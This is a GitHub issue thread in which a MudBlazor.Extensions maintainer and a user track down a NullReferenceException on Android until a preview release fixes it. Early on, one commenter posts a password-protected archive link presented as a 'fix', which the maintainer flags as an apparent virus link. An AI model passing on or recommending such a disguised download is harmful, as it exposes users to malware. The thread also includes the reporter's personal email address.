### ISSUE TITLE
.net maui Blazor hybrid - null object reference

### ISSUE THREAD

**Issue by whann0205** [fgilde/MudBlazor.Extensions#102]
### Contact Details

w.hann@hann-edv.at

### What happened?

System.NullReferenceException
  Message=Object reference not set to an instance of an object.

### Expected Behavior

I hoped to use that extension with mudblazor.

### Screenshots

![grafik](https://github.com/user-attachments/assets/c9cc3494-451f-4daf-86e7-d5ccc5c6a7cc)

### What application type are you referring to?

MAUI

### MudBlazor.Extension Version

2.0.3

### MudBlazor Version

7.5

### What .net Version are you using?

.Net8

### What browser are you using?

Firefox

### Sample Solution

https://github.com/whann0205/MudblazorExt4Maui

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by fgilde** [comment]
sorry for late response. I will have a look asap at your bug. and for your other question I cant see a file post here, but I also received an email that looks like somebody posted a virus link in github here

**Comment by whann0205** [comment]
Sorry for my delay.
Had been on holidays. 
Hmm. I can see that you do not get any exceptions.
I upgraded all nugets to the latest version (as you can see in the attached csproj).
Also i upgraded the visual studio to the latest version.
Still ...
![grafik](https://github.com/user-attachments/assets/c9032613-523f-49f6-bcb3-4ffcfedd2c43)

[MudblazorExt4Maui.csproj.zip](https://github.com/user-attachments/files/16974139/MudblazorExt4Maui.csproj.zip)

Please tell me what else i can provide to you in order to make this work.

**Comment by fgilde** [comment]
Hard to say but maybe you can firstly paste the full callstack here

**Comment by fgilde** [comment]
I fixed one reference issues that can cause the error.  Can you maybe try it again with the [preview package 2.0.6-prev-2410112222-main](https://www.nuget.org/packages/MudBlazor.Extensions/2.0.6-prev-2410112222-main#readme-body-tab)

```xml
<PackageReference Include="MudBlazor.Extensions" Version="2.0.6-prev-2410112222-main" />
```

**Comment by whann0205** [comment]
I have tried it again, but unfortunealy the error persists.
<img width="2557" alt="Screenshot 2024-10-12 060227" src="https://github.com/user-attachments/assets/e09f08d6-8ab3-45af-9472-4fd650973a97">
Also cleared obj and bin first and rebuilt the whole solution to no avail.
You can clone the updated solution from
(https://github.com/whann0205/MudblazorExt4Maui)

**Comment by whann0205** [comment]
Also did test the solution on my mac m1.
I tried first to compile with maccatalyst it 
compiles and runs without any problem!
Then i tried with android
![20241012_062704](https://github.com/user-attachments/assets/96d0126e-f0a9-4009-bc48-8231e34e5d9f)
So the problem is definitely related to android 
not necessarily machine centric!

**Comment by fgilde** [comment]
I still cant reproduce, can you please test this version?

```<PackageReference Include="MudBlazor.Extensions" Version="2.0.6-prev-2410121210-main" />```

**Comment by whann0205** [comment]
I am happy to tell you that it works with that version!!

**Comment by fgilde** [comment]
That makes me happy. Great. I create a release later this day and close the issue then afterwards

**Comment by fgilde** [comment]
Fixed in [MudBlazor.Extensions 2.0.6 Nuget](https://www.nuget.org/packages/MudBlazor.Extensions/2.0.6#readme-body-tab)
